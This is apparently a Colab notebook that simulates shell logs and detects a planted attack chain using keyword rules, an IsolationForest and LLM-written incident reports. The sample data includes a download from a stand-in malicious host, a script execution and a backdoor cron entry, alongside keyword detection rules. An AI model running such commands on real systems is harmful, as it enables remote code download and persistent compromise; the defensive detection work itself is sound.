### **AI Threat Detector Simulator**

Create production like logs.
Note: In real world scenario, we will need to work on data cleanup to align it with the workable demo.

In [1]:
import pandas as pd
import random
from datetime import datetime, timedelta

users = ["user1", "user2", "root"]

# Normal commands
normal_commands = [
    ("ls -la", "benign", None),
    ("vim file.txt", "benign", None),
    ("python app.py", "benign", None),
    ("ssh user@host", "benign", None),
]

# Attack chain mapped to MITRE
attack_chain = [
    {
        "command": "curl http://malicious.com/script.sh",
        "process": "curl",
        "stage": "Command and Control",
        "technique": "T1105"
    },
    {
        "command": "bash script.sh",
        "process": "bash",
        "stage": "Execution",
        "technique": "T1059"
    },
    {
        "command": "echo '* * * * * /tmp/backdoor.sh' > cron",
        "process": "cron",
        "stage": "Persistence",
        "technique": "T1053"
    }
]

data = []
start_time = datetime.now()

for session in range(30):
    timestamp = start_time + timedelta(minutes=session * 5)
    user = random.choice(users)

    if random.random() < 0.35:  # 35% attack sessions
        for step in attack_chain:
            data.append({
                "timestamp": timestamp,
                "session_id": session,
                "process": step["process"],
                "command": step["command"],
                "user": user,
                "attack_stage": step["stage"],
                "technique_id": step["technique"],
                "label": "suspicious"
            })
            timestamp += timedelta(seconds=40)
    else:
        for _ in range(random.randint(2, 5)):
            cmd, stage, tech = random.choice(normal_commands)
            data.append({
                "timestamp": timestamp,
                "session_id": session,
                "process": cmd.split()[0],
                "command": cmd,
                "user": user,
                "attack_stage": stage,
                "technique_id": tech,
                "label": "normal"
            })
            timestamp += timedelta(seconds=40)

df = pd.DataFrame(data)
df.head(20)

,timestamp,session_id,process,command,user,attack_stage,technique_id,label
0,2026-03-24 09:03:58.983981,0,python,python app.py,user1,benign,None,normal
1,2026-03-24 09:04:38.983981,0,vim,vim file.txt,user1,benign,None,normal
2,2026-03-24 09:08:58.983981,1,curl,curl http://malicious.com/script.sh,user1,Command and Control,T1105,suspicious
3,2026-03-24 09:09:38.983981,1,bash,bash script.sh,user1,Execution,T1059,suspicious
4,2026-03-24 09:10:18.983981,1,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious
5,2026-03-24 09:13:58.983981,2,curl,curl http://malicious.com/script.sh,root,Command and Control,T1105,suspicious
6,2026-03-24 09:14:38.983981,2,bash,bash script.sh,root,Execution,T1059,suspicious
7,2026-03-24 09:15:18.983981,2,cron,echo '* * * * * /tmp/backdoor.sh' > cron,root,Persistence,T1053,suspicious
8,2026-03-24 09:18:58.983981,3,vim,vim file.txt,user1,benign,None,normal
9,2026-03-24 09:19:38.983981,3,vim,vim file.txt,user1,benign,None,normal
10,2026-03-24 09:20:18.983981,3,python,python app.py,user1,benign,None,normal
11,2026-03-24 09:20:58.983981,3,python,python app.py,user1,benign,None,normal
12,2026-03-24 09:23:58.983981,4,python,python app.py,user2,benign,None,normal
13,2026-03-24 09:24:38.983981,4,ssh,ssh user@host,user2,benign,None,normal
14,2026-03-24 09:28:58.983981,5,ls,ls -la,user1,benign,None,normal
15,2026-03-24 09:29:38.983981,5,python,python app.py,user1,benign,None,normal
16,2026-03-24 09:30:18.983981,5,python,python app.py,user1,benign,None,normal
17,2026-03-24 09:30:58.983981,5,vim,vim file.txt,user1,benign,None,normal
18,2026-03-24 09:31:38.983981,5,ssh,ssh user@host,user1,benign,None,normal
19,2026-03-24 09:33:58.983981,6,python,python app.py,user1,benign,None,normal

Model the detection logic with a scorer

In [2]:
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import LabelEncoder

df_copy = df.copy()

# ---------------------------
# 1. RULE-BASED DETECTION
# ---------------------------

def rule_based_score(row):
    score = 0

    # Suspicious keywords
    if "curl" in row["command"] or "wget" in row["command"]:
        score += 2
    if "bash" in row["command"] and "http" in row["command"]:
        score += 3
    if "cron" in row["command"]:
        score += 3
    if row["user"] == "root":
        score += 1

    return score

df_copy["rule_score"] = df_copy.apply(rule_based_score, axis=1)

# ---------------------------
# 2. FEATURE ENGINEERING
# ---------------------------

le_process = LabelEncoder()
le_user = LabelEncoder()

df_copy["process_enc"] = le_process.fit_transform(df_copy["process"])
df_copy["user_enc"] = le_user.fit_transform(df_copy["user"])
df_copy["command_length"] = df_copy["command"].apply(len)

features = df_copy[["process_enc", "user_enc", "command_length"]]

# ---------------------------
# 3. ANOMALY DETECTION
# ---------------------------

model = IsolationForest(contamination=0.2, random_state=42)
df_copy["anomaly_score"] = model.fit_predict(features)

# Convert (-1 = anomaly, 1 = normal) → score
df_copy["anomaly_score"] = df_copy["anomaly_score"].apply(lambda x: 1 if x == -1 else 0)

# ---------------------------
# 4. FINAL SCORING
# ---------------------------

df_copy["final_score"] = df_copy["rule_score"] + df_copy["anomaly_score"]

# Flag suspicious
df_copy["flagged"] = df_copy["final_score"] >= 3

df_copy.head(20)

,timestamp,session_id,process,command,user,attack_stage,technique_id,label,rule_score,process_enc,user_enc,command_length,anomaly_score,final_score,flagged
0,2026-03-24 09:03:58.983981,0,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False
1,2026-03-24 09:04:38.983981,0,vim,vim file.txt,user1,benign,None,normal,0,6,1,12,0,0,False
2,2026-03-24 09:08:58.983981,1,curl,curl http://malicious.com/script.sh,user1,Command and Control,T1105,suspicious,2,2,1,35,0,2,False
3,2026-03-24 09:09:38.983981,1,bash,bash script.sh,user1,Execution,T1059,suspicious,0,0,1,14,0,0,False
4,2026-03-24 09:10:18.983981,1,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious,3,1,1,40,0,3,True
5,2026-03-24 09:13:58.983981,2,curl,curl http://malicious.com/script.sh,root,Command and Control,T1105,suspicious,3,2,0,35,1,4,True
6,2026-03-24 09:14:38.983981,2,bash,bash script.sh,root,Execution,T1059,suspicious,1,0,0,14,1,2,False
7,2026-03-24 09:15:18.983981,2,cron,echo '* * * * * /tmp/backdoor.sh' > cron,root,Persistence,T1053,suspicious,4,1,0,40,1,5,True
8,2026-03-24 09:18:58.983981,3,vim,vim file.txt,user1,benign,None,normal,0,6,1,12,0,0,False
9,2026-03-24 09:19:38.983981,3,vim,vim file.txt,user1,benign,None,normal,0,6,1,12,0,0,False
10,2026-03-24 09:20:18.983981,3,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False
11,2026-03-24 09:20:58.983981,3,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False
12,2026-03-24 09:23:58.983981,4,python,python app.py,user2,benign,None,normal,0,4,2,13,0,0,False
13,2026-03-24 09:24:38.983981,4,ssh,ssh user@host,user2,benign,None,normal,0,5,2,13,0,0,False
14,2026-03-24 09:28:58.983981,5,ls,ls -la,user1,benign,None,normal,0,3,1,6,1,1,False
15,2026-03-24 09:29:38.983981,5,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False
16,2026-03-24 09:30:18.983981,5,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False
17,2026-03-24 09:30:58.983981,5,vim,vim file.txt,user1,benign,None,normal,0,6,1,12,0,0,False
18,2026-03-24 09:31:38.983981,5,ssh,ssh user@host,user1,benign,None,normal,0,5,1,13,0,0,False
19,2026-03-24 09:33:58.983981,6,python,python app.py,user1,benign,None,normal,0,4,1,13,0,0,False

Check detection

In [3]:
df_copy["flagged"].value_counts()

flagged
False    83
True     12
Name: count, dtype: int64

View flagged cases

In [4]:
df_copy[df_copy["flagged"] == True].head(10)

,timestamp,session_id,process,command,user,attack_stage,technique_id,label,rule_score,process_enc,user_enc,command_length,anomaly_score,final_score,flagged
4,2026-03-24 09:10:18.983981,1,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious,3,1,1,40,0,3,True
5,2026-03-24 09:13:58.983981,2,curl,curl http://malicious.com/script.sh,root,Command and Control,T1105,suspicious,3,2,0,35,1,4,True
7,2026-03-24 09:15:18.983981,2,cron,echo '* * * * * /tmp/backdoor.sh' > cron,root,Persistence,T1053,suspicious,4,1,0,40,1,5,True
30,2026-03-24 09:45:18.983981,8,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious,3,1,1,40,0,3,True
46,2026-03-24 10:10:18.983981,13,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious,3,1,1,40,0,3,True
53,2026-03-24 10:23:58.983981,16,curl,curl http://malicious.com/script.sh,root,Command and Control,T1105,suspicious,3,2,0,35,1,4,True
55,2026-03-24 10:25:18.983981,16,cron,echo '* * * * * /tmp/backdoor.sh' > cron,root,Persistence,T1053,suspicious,4,1,0,40,1,5,True
56,2026-03-24 10:28:58.983981,17,curl,curl http://malicious.com/script.sh,root,Command and Control,T1105,suspicious,3,2,0,35,1,4,True
58,2026-03-24 10:30:18.983981,17,cron,echo '* * * * * /tmp/backdoor.sh' > cron,root,Persistence,T1053,suspicious,4,1,0,40,1,5,True
75,2026-03-24 11:00:18.983981,23,cron,echo '* * * * * /tmp/backdoor.sh' > cron,user1,Persistence,T1053,suspicious,3,1,1,40,0,3,True

GROQ LLM - Free Tier

In [5]:
!pip install groq

Collecting groq
  Downloading groq-1.1.1-py3-none-any.whl.metadata (16 kB)
Requirement already satisfied: anyio<5,>=3.5.0 in /usr/local/lib/python3.12/dist-packages (from groq) (4.12.1)
Requirement already satisfied: distro<2,>=1.7.0 in /usr/local/lib/python3.12/dist-packages (from groq) (1.9.0)
Requirement already satisfied: httpx<1,>=0.23.0 in /usr/local/lib/python3.12/dist-packages (from groq) (0.28.1)
Requirement already satisfied: pydantic<3,>=1.9.0 in /usr/local/lib/python3.12/dist-packages (from groq) (2.12.3)
Requirement already satisfied: sniffio in /usr/local/lib/python3.12/dist-packages (from groq) (1.3.1)
Requirement already satisfied: typing-extensions<5,>=4.10 in /usr/local/lib/python3.12/dist-packages (from groq) (4.15.0)
Requirement already satisfied: idna>=2.8 in /usr/local/lib/python3.12/dist-packages (from anyio<5,>=3.5.0->groq) (3.11)
Requirement already satisfied: certifi in /usr/local/lib/python3.12/dist-packages (from httpx<1,>=0.23.0->groq) (2026.2.25)
Requirement already satisfied: httpcore==1.* in /usr/local/lib/python3.12/dist-packages (from httpx<1,>=0.23.0->groq) (1.0.9)
Requirement already satisfied: h11>=0.16 in /usr/local/lib/python3.12/dist-packages (from httpcore==1.*->httpx<1,>=0.23.0->groq) (0.16.0)
Requirement already satisfied: annotated-types>=0.6.0 in /usr/local/lib/python3.12/dist-packages (from pydantic<3,>=1.9.0->groq) (0.7.0)
Requirement already satisfied: pydantic-core==2.41.4 in /usr/local/lib/python3.12/dist-packages (from pydantic<3,>=1.9.0->groq) (2.41.4)
Requirement already satisfied: typing-inspection>=0.4.2 in /usr/local/lib/python3.12/dist-packages (from pydantic<3,>=1.9.0->groq) (0.4.2)
Downloading groq-1.1.1-py3-none-any.whl (139 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 139.7/139.7 kB 3.6 MB/s eta 0:00:00
Installing collected packages: groq
Successfully installed groq-1.1.1

In [7]:
from google.colab import userdata
from groq import Groq

client = Groq(api_key=userdata.get("GROQ_API_KEY"))

In [8]:
def build_prompt(row):
    return f"""
You are a cybersecurity analyst.

Analyze this system event:

Command: {row['command']}
Process: {row['process']}
User: {row['user']}

Respond in this format:

Explanation:
- What does this command do?

Suspicion:
- Why could this be malicious?

Attack Stage:
- Likely stage (Execution, Persistence, etc.)

Next Steps:
- What should be investigated next?
"""

In [14]:
def analyze_with_llm(row):
    prompt = build_prompt(row)

    response = client.chat.completions.create(
        model="llama-3.3-70b-versatile",
        messages=[
            {"role": "system", "content": "You are an expert cybersecurity analyst."},
            {"role": "user", "content": prompt}
        ],
        temperature=0.2
    )

    return response.choices[0].message.content

Sample LLM Test

In [15]:
sample = df_copy[df_copy["flagged"] == True].iloc[0]
print(analyze_with_llm(sample))

Explanation:
- This command uses the `echo` command to append a new cron job to the cron table. The cron job is set to run every minute (`* * * * *`) and executes a script located at `/tmp/backdoor.sh`. The output of the `echo` command is redirected to a file named `cron`, which is likely the cron table for the user `user1`.

Suspicion:
- This could be malicious because it attempts to add a new cron job that runs a script from a temporary directory (`/tmp`), which is an unusual location for a legitimate script. Additionally, the script is named `backdoor.sh`, which suggests that it may be a malicious backdoor script designed to provide unauthorized access to the system. The fact that the script is being added to the cron table without going through the usual cron configuration files (`crontab` command) also raises suspicions.

Attack Stage:
- Likely stage: Persistence. The attacker is trying to ensure that the malicious script runs continuously, even after a system reboot. By adding the script to the cron table, the attacker can maintain persistence on the system and potentially use it as a beachhead for further attacks.

Next Steps:
- What should be investigated next:
  1. Investigate the contents of the `/tmp/backdoor.sh` script to determine its purpose and potential malicious activities.
  2. Check the system logs to see if there are any other suspicious activities or commands executed by `user1` around the same time.
  3. Verify if the cron job was successfully added to the cron table and if it's currently running.
  4. Check for any other suspicious files or scripts in the `/tmp` directory.
  5. Consider isolating the system from the network to prevent potential lateral movement or exfiltration of sensitive data.

Check logs

In [16]:
def get_session_logs(df, row):
    session_id = row["session_id"]
    return df[df["session_id"] == session_id]

Build Agent

In [22]:
def build_agent_prompt(session_df):
    logs = ""

    for _, r in session_df.iterrows():
        logs += f"- {r['timestamp']} | {r['process']} | {r['command']} | user={r['user']}\n"

    return f"""
You are a cybersecurity analyst investigating a sequence of system events.

Here is the full activity timeline:
{logs}

Instructions:
- Avoid generic explanations
- Tailor reasoning to this specific session (user, commands, sequence)
- Consider user privilege, frequency, and system-level impact

Tasks:

1. Summary of Events
- What happened in this session?

2. Attack Pattern Identification
- Is this an attack? What type?

3. Attack Chain Explanation
- Explain step-by-step what the attacker is doing

4. MITRE ATT&CK Mapping
- Map each step to attack stages (Execution, Persistence, etc.)

5. Detection Signals
- What signals triggered detection?
  (e.g., unusual command, root execution, persistence mechanism)

6. Risk Level
- Low / Medium / High / Critical (justify briefly)

7. Confidence Level
- Low / Medium / High (justify briefly)

8. Suggested Next Steps
- What should a security team do next?

Be structured, specific, and concise.
"""

Define agent investigation

In [23]:
def investigate_with_agent(df, row):
    session_df = df[df["session_id"] == row["session_id"]]
    prompt = build_agent_prompt(session_df)

    response = client.chat.completions.create(
        model="llama-3.3-70b-versatile",
        messages=[
            {"role": "system", "content": "You are an expert cybersecurity analyst."},
            {"role": "user", "content": prompt}
        ],
        temperature=0.2
    )

    return response.choices[0].message.content

In [24]:
unique_sessions = df_copy[df_copy["flagged"] == True]["session_id"].unique()
unique_sessions

array([ 1,  2,  8, 13, 16, 17, 23, 25, 27])

Make Agent Investigate

In [25]:
reports = []

for session_id in unique_sessions:
    row = df_copy[df_copy["session_id"] == session_id].iloc[0]

    report = investigate_with_agent(df_copy, row)

    reports.append({
        "session_id": int(session_id),
        "report": report
    })

reports

[{'session_id': 1,
  'report': "### 1. Summary of Events\nIn this session, user `user1` executed a sequence of commands that involved downloading a script from a potentially malicious website (`http://malicious.com/script.sh`), executing the script using `bash`, and then setting up a cron job that points to a backdoor script (`/tmp/backdoor.sh`). This sequence of events suggests a potential security breach.\n\n### 2. Attack Pattern Identification\nYes, this appears to be an attack. The pattern suggests a remote access trojan (RAT) or backdoor attack, where the attacker gains access to the system, executes malicious scripts, and establishes persistence.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker starts by using `curl` to download a script from `http://malicious.com/script.sh`. This could be a malicious script designed to gain initial access or to prepare the system for further exploitation.\n2. **Execution**: The downloaded script (`script.sh`) is then executed using `bash`. This script likely contains commands that further compromise the system or prepare it for the attacker's tools.\n3. **Persistence**: The attacker sets up a cron job that runs every minute (`* * * * *`) and executes a backdoor script located in `/tmp/backdoor.sh`. This ensures that even if the initial script or the attacker's access is terminated, the backdoor will allow the attacker to regain access and continue malicious activities.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access (TA0001)**: Downloading the script using `curl`.\n- **Execution (TA0002)**: Executing the `script.sh` using `bash`.\n- **Persistence (TA0003)**: Setting up a cron job to run the backdoor script.\n\n### 5. Detection Signals\n- Unusual command execution (`curl` downloading a script from an unknown site).\n- Execution of a script downloaded from the internet.\n- Creation of a cron job pointing to a script in `/tmp`, which is an unusual location for system cron jobs.\n\n### 6. Risk Level\n**Critical**: The attacker has likely gained persistent access to the system, which could lead to data theft, further system compromise, or use of the system as a launch point for other attacks.\n\n### 7. Confidence Level\n**High**: The sequence of downloading and executing a script from a potentially malicious site, followed by setting up a backdoor, strongly indicates malicious intent.\n\n### 8. Suggested Next Steps\n1. **Immediate Containment**: Isolate the affected system from the network to prevent further damage.\n2. **Incident Response**: Activate the incident response team to investigate the breach, assess the damage, and eradicate the threat.\n3. **System Forensics**: Perform a thorough forensic analysis of the system to understand the scope of the breach and identify any additional malicious activities.\n4. **Patch and Secure**: Ensure all systems are up-to-date with the latest security patches and secure any vulnerabilities that could have been exploited.\n5. **Monitor for Similar Activity**: Closely monitor the network for similar patterns of activity that could indicate additional breaches or attempts."},
 {'session_id': 2,
  'report': "### 1. Summary of Events\nIn this session, the user `root` executed a sequence of commands that involved downloading a script from a potentially malicious website (`http://malicious.com/script.sh`), executing it using `bash`, and then setting up a cron job that points to a backdoor script (`/tmp/backdoor.sh`). This sequence of events suggests a potential security breach.\n\n### 2. Attack Pattern Identification\nYes, this appears to be an attack. The pattern suggests a remote access trojan (RAT) or backdoor installation, aiming to establish persistent, unauthorized access to the system.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker starts by using `curl` to download a script (`script.sh`) from a malicious website. This is likely the initial access vector, exploiting a vulnerability or social engineering to gain access.\n2. **Execution**: The downloaded script is then executed with `bash`, potentially installing malware or setting up a backdoor. This step executes the attacker's payload.\n3. **Persistence**: The attacker sets up a cron job to periodically execute a backdoor script (`/tmp/backdoor.sh`), ensuring that even if the initial malware is removed, the system remains compromised.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access (TA0001)**: Downloading the script with `curl`.\n- **Execution (TA0002)**: Executing the script with `bash`.\n- **Persistence (TA0003)**: Setting up a cron job for the backdoor script.\n\n### 5. Detection Signals\n- **Unusual Command**: Downloading and executing scripts from unknown sources.\n- **Root Execution**: The use of `root` privileges for these actions.\n- **Persistence Mechanism**: The setup of a cron job pointing to a suspicious script.\n\n### 6. Risk Level\n**Critical**: The use of `root` privileges and the establishment of a persistence mechanism indicate a high level of access and control, posing a significant risk to the system's security and integrity.\n\n### 7. Confidence Level\n**High**: The sequence of downloading and executing a script from a malicious source, followed by setting up a persistence mechanism, strongly indicates a malicious intent and action, giving a high confidence level in the assessment of this being an attack.\n\n### 8. Suggested Next Steps\n1. **Immediate Containment**: Isolate the affected system from the network to prevent further damage.\n2. **Incident Response**: Activate the incident response team to investigate the breach, focusing on how the initial access was gained and what data might have been compromised.\n3. **Malware Analysis**: Analyze the downloaded script and the backdoor script to understand their capabilities and intentions.\n4. **System Hardening**: Review system configurations and apply patches to prevent similar breaches in the future.\n5. **Monitoring**: Closely monitor the network and system logs for any signs of further malicious activity."},
 {'session_id': 8,
  'report': '### 1. Summary of Events\nIn this session, user `user1` executed a sequence of commands that started with downloading a script from `http://malicious.com/script.sh` using `curl`, followed by executing the downloaded script using `bash`. Subsequently, a cron job was set up to run a script named `backdoor.sh` located in `/tmp` every minute.\n\n### 2. Attack Pattern Identification\nThis appears to be an attack, specifically a type of malware or backdoor installation, given the download and execution of a script from a potentially malicious source and the setup of a persistent backdoor mechanism.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker gains initial access to the system, possibly through phishing, exploitation of a vulnerability, or other means not shown in the log.\n2. **Execution**: The attacker uses `curl` to download a malicious script (`script.sh`) from `http://malicious.com/script.sh`, indicating an attempt to execute malicious code on the system.\n3. **Persistence**: The downloaded script is then executed using `bash`, which likely contains commands to establish persistence on the system.\n4. **Persistence Mechanism**: A cron job is set up to run `/tmp/backdoor.sh` every minute, ensuring the attacker maintains access to the system even after the initial session is closed.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access**: Not directly observed in the log, but implied.\n- **Execution (TA0002)**: `curl http://malicious.com/script.sh` and `bash script.sh` commands.\n- **Persistence (TA0003)**: Setting up a cron job to run `/tmp/backdoor.sh` every minute.\n- **Defense Evasion (TA0005)**: Potentially, if the script takes measures to avoid detection, though not explicitly shown.\n\n### 5. Detection Signals\n- Unusual command execution (`curl` downloading a script and then executing it with `bash`).\n- Setting up a cron job to run a script from `/tmp`, which is an unusual location for system-level cron jobs.\n- The rapid sequence of suspicious commands within a short timeframe.\n\n### 6. Risk Level\n**High**: The attack involves downloading and executing unknown scripts, which could contain any form of malware, and setting up a backdoor for persistent access. This poses a significant risk to system integrity and data security.\n\n### 7. Confidence Level\n**High**: The sequence of events (downloading a script from a potentially malicious source, executing it, and setting up a persistence mechanism) strongly indicates a malicious intent, giving a high confidence level in the assessment that this is an attack.\n\n### 8. Suggested Next Steps\n1. **Immediate Containment**: Isolate the affected system from the network to prevent further damage.\n2. **Incident Response**: Activate the incident response team to investigate the extent of the breach.\n3. **Malware Analysis**: Analyze the downloaded script and the backdoor script to understand their capabilities and intentions.\n4. **System Cleanup**: Remove the malicious scripts, and clean up any changes made by the attacker.\n5. **Monitoring**: Closely monitor the system for any signs of further malicious activity.\n6. **Review Access Controls**: Review how `user1` gained the privileges to execute these commands and adjust access controls as necessary.'},
 {'session_id': 13,
  'report': '### 1. Summary of Events\nIn this session, user `user1` executed a sequence of commands that suggest a potential attack. The sequence involves downloading a script from a malicious URL, executing it, and then setting up a cron job to run another script (`backdoor.sh`) every minute.\n\n### 2. Attack Pattern Identification\nThis appears to be an attack, specifically a type of malware or backdoor installation, aiming to establish persistence and potentially allow remote access or command execution on the compromised system.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker starts by using `curl` to download a script (`script.sh`) from `http://malicious.com/script.sh`. This suggests the system was either compromised previously or the user was tricked into executing this command.\n2. **Execution**: The downloaded script is then executed using `bash`. This step likely installs or sets up the malware or backdoor.\n3. **Persistence**: The attacker then edits the cron table to include a job that runs `/tmp/backdoor.sh` every minute. This ensures the malware or backdoor remains active even after a system reboot.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access**: The `curl` command to download `script.sh` maps to "User Execution" (T1204) under the Execution tactic.\n- **Execution**: Running `script.sh` with `bash` also falls under "User Execution" (T1204).\n- **Persistence**: Modifying the cron job to run `backdoor.sh` maps to "Cron Job" (T1053) under the Persistence tactic.\n\n### 5. Detection Signals\n- **Unusual Command**: Downloading and executing scripts from unknown or malicious URLs.\n- **Persistence Mechanism**: Modifying system cron jobs to run potentially malicious scripts.\n- **Potential Privilege Escalation**: If `user1` has elevated privileges or the scripts exploit vulnerabilities to gain higher access levels.\n\n### 6. Risk Level\n**High**: The sequence of events indicates a clear intent to establish a persistent backdoor, which could lead to unauthorized access, data theft, or further malicious activities.\n\n### 7. Confidence Level\n**High**: The specific actions (downloading from a malicious URL, executing unknown scripts, and setting up a cron job for a backdoor) strongly indicate malicious intent.\n\n### 8. Suggested Next Steps\n1. **Immediate Containment**: Isolate the affected system to prevent further damage.\n2. **Incident Response**: Perform a thorough analysis of the system and network logs to understand the scope of the compromise.\n3. **Malware Analysis**: Analyze the `script.sh` and `backdoor.sh` scripts to understand their capabilities and potential communication with command and control (C2) servers.\n4. **System Hardening**: Review and strengthen system security configurations, including ensuring that only necessary services are running and that all software is up-to-date.\n5. **User Education**: Educate users about the risks of executing scripts from untrusted sources and the importance of reporting suspicious activities.'},
 {'session_id': 16,
  'report': "### 1. Summary of Events\nIn this session, the user `root` executed a sequence of commands that involved downloading a script from a potentially malicious website (`http://malicious.com/script.sh`), executing it using `bash`, and then modifying the `cron` table to include a new job that runs a script (`/tmp/backdoor.sh`) every minute. This sequence of events suggests a potential security breach.\n\n### 2. Attack Pattern Identification\nYes, this appears to be an attack, specifically a form of remote access trojan (RAT) or backdoor installation. The attacker is leveraging the `root` user's privileges to establish persistence and potentially gain future access to the system.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker starts by using `curl` to download a script (`script.sh`) from a malicious website. This indicates the attacker has already gained access to the system or is using social engineering to trick the user into executing the command.\n2. **Execution**: The downloaded script is then executed using `bash`. This step likely involves the script performing its intended malicious action, which could include setting up a backdoor, stealing data, or installing additional malware.\n3. **Persistence**: The attacker modifies the `cron` table to run a new script (`/tmp/backdoor.sh`) every minute. This ensures that even if the initial script or any malware it installed is removed, the backdoor will be re-established, maintaining the attacker's access to the system.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access**: Execution (T1204) - The script is downloaded and executed.\n- **Execution**: Execution (T1204) - The script is run by `bash`.\n- **Persistence**: Scheduled Task/Job (T1053) - The `cron` job is modified to run the backdoor script.\n\n### 5. Detection Signals\n- **Unusual Command**: Downloading and executing a script from an unknown website.\n- **Root Execution**: The use of `root` privileges for these actions.\n- **Persistence Mechanism**: Modification of the `cron` table to establish a recurring task.\n\n### 6. Risk Level\n**Critical**: The use of `root` privileges and the establishment of a backdoor indicate a high level of access and control by the attacker, posing a significant risk to the system's security and data integrity.\n\n### 7. Confidence Level\n**High**: The sequence of events, including downloading a script from a malicious site, executing it with `root` privileges, and setting up a `cron` job for persistence, strongly indicates a malicious attack with a clear intent to establish a backdoor.\n\n### 8. Suggested Next Steps\n1. **Isolate the System**: Immediately disconnect the system from the network to prevent further malicious activity.\n2. **Conduct a Full System Audit**: Look for any additional malware, backdoors, or compromised accounts.\n3. **Remove the Backdoor**: Delete the `/tmp/backdoor.sh` script and remove the `cron` job that executes it.\n4. **Change Passwords**: Especially for the `root` user and any other accounts that may have been compromised.\n5. **Monitor System Activity**: Closely watch system logs for any signs of further malicious activity.\n6. **Implement Security Updates**: Ensure all software is up-to-date to prevent exploitation of known vulnerabilities."},
 {'session_id': 17,
  'report': '### 1. Summary of Events\nIn this session, a sequence of commands was executed under the root user, starting with downloading a script from a malicious URL, executing it, and then setting up a cron job to run a backdoor script every minute.\n\n### 2. Attack Pattern Identification\nYes, this is an attack. The pattern suggests a remote access trojan (RAT) or backdoor installation, aiming to establish persistent, unauthorized access to the system.\n\n### 3. Attack Chain Explanation\n1. **Initial Access**: The attacker starts by using `curl` to download a script (`script.sh`) from `http://malicious.com/script.sh`, indicating the system has been compromised to the point where an attacker can execute commands as the root user.\n2. **Execution**: The downloaded script is then executed using `bash`, likely containing malicious code designed to further compromise the system or establish a backdoor.\n3. **Persistence**: The attacker sets up a cron job to run a backdoor script (`/tmp/backdoor.sh`) every minute, ensuring the attacker maintains access to the system even if the initial script execution is terminated.\n\n### 4. MITRE ATT&CK Mapping\n- **Initial Access (TA0001)**: Downloading the script using `curl`.\n- **Execution (TA0002)**: Executing the script with `bash`.\n- **Persistence (TA0003)**: Setting up a cron job for the backdoor script.\n\n### 5. Detection Signals\n- **Unusual Command**: Downloading and executing scripts from unknown URLs.\n- **Root Execution**: Commands are executed under the root user, indicating elevated privileges.\n- **Persistence Mechanism**: Setting up a cron job for continuous execution of a suspicious script.\n\n### 6. Risk Level\n**Critical**: The attack involves executing scripts from untrusted sources as the root user and setting up a persistence mechanism, indicating a high level of system compromise and potential for further malicious activities.\n\n### 7. Confidence Level\n**High**: The sequence of downloading and executing a script from a malicious URL, followed by setting up a cron job for a backdoor, strongly indicates a malicious intent and a successful compromise of the system.\n\n### 8. Suggested Next Steps\n1. **Isolate the System**: Immediately disconnect the system from the network to prevent further damage.\n2. **Conduct a Full System Scan**: Use antivirus and anti-malware tools to scan the system for any other malicious software.\n3. **Remove the Backdoor**: Manually remove the cron job and the backdoor script.\n4. **Change Credentials**: Change all system and application passwords, especially the root password.\n5. **Monitor System Activity**: Closely monitor system logs for any signs of further unauthorized access or malicious activity.\n6. **Perform a System Restore or Rebuild**: Consider restoring the system from a known good backup or rebuilding it from scratch to ensure all malicious components are removed.'},
 {'session_id': 23,

Save reults to JSON

In [26]:
import json

with open("reports.json", "w") as f:
    json.dump(reports, f, indent=2)

print("Saved to reports.json")

Saved to reports.json

Evaluation

In [27]:
# True labels vs predicted flags
y_true = df_copy["label"].apply(lambda x: 1 if x == "suspicious" else 0)
y_pred = df_copy["flagged"].apply(lambda x: 1 if x else 0)

from sklearn.metrics import classification_report

print(classification_report(y_true, y_pred))

              precision    recall  f1-score   support

           0       0.82      1.00      0.90        68
           1       1.00      0.44      0.62        27

    accuracy                           0.84        95
   macro avg       0.91      0.72      0.76        95
weighted avg       0.87      0.84      0.82        95

Define detection signals

In [28]:
def extract_detection_signals(row):
    signals = []

    if "curl" in row["command"] or "wget" in row["command"]:
        signals.append("External script download")

    if "bash" in row["command"]:
        signals.append("Script execution")

    if "cron" in row["command"]:
        signals.append("Persistence mechanism")

    if row["user"] == "root":
        signals.append("High privilege execution")

    if row["anomaly_score"] == 1:
        signals.append("Anomalous behavior (ML)")

    return signals


df_copy["detection_signals"] = df_copy.apply(extract_detection_signals, axis=1)

df_copy[df_copy["flagged"] == True][["command", "detection_signals"]].head()

,command,detection_signals
4,echo '* * * * * /tmp/backdoor.sh' > cron,[Persistence mechanism]
5,curl http://malicious.com/script.sh,"[External script download, High privilege exec..."
7,echo '* * * * * /tmp/backdoor.sh' > cron,"[Persistence mechanism, High privilege executi..."
30,echo '* * * * * /tmp/backdoor.sh' > cron,[Persistence mechanism]
46,echo '* * * * * /tmp/backdoor.sh' > cron,[Persistence mechanism]